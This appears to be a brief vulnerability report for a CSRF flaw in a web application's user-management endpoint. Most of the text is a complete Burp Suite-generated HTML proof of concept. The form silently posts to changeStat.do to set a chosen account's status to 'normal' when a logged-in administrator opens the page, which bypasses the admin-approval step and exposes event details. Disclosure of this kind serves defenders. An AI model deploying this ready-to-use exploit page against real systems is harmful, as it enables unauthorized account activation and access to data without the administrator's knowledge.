Users can register by themselves, but the administrator needs to change the user status before they can log in. After using the CSRF vulnerability to change the status, you can view the details of all events.
1. Click on the system configuration in the upper right corner, click on user management, click on the unlock button
2. Use burpSuit to capture packets, and then generate CSRF poc
3. Will return true after success
POC: Change user status
After the administrator logged in, open the following page
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8080/cynthia_war/user/changeStat.do" method="POST">
<input type="hidden" name="user" value="vq2lumok@qq.com" />
<input type="hidden" name="status" value="normal" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
中国移动通信集团广西有限公司